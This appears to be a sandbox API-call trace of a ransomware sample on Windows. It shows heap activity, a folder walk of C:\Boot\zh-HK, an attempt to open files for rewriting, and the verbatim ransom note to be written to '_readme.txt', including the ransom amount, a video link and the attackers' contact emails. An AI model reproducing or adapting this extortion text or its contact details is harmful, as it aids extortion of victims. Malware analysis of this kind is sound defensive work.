dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.785] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0179.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.801] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.801] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.801] PathFindFileNameW (pszPath="") returned="" [0179.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.801] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.802] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0179.802] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0179.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.836] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x81c) returned 0x2d154b0 [0179.853] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0179.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.853] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0179.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.854] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.854] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.854] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.856] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*" (normalized: "c:\\boot\\zh-hk\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.857] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.857] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.857] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned=".mui" [0179.857] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.858] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.858] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.860] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.860] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, 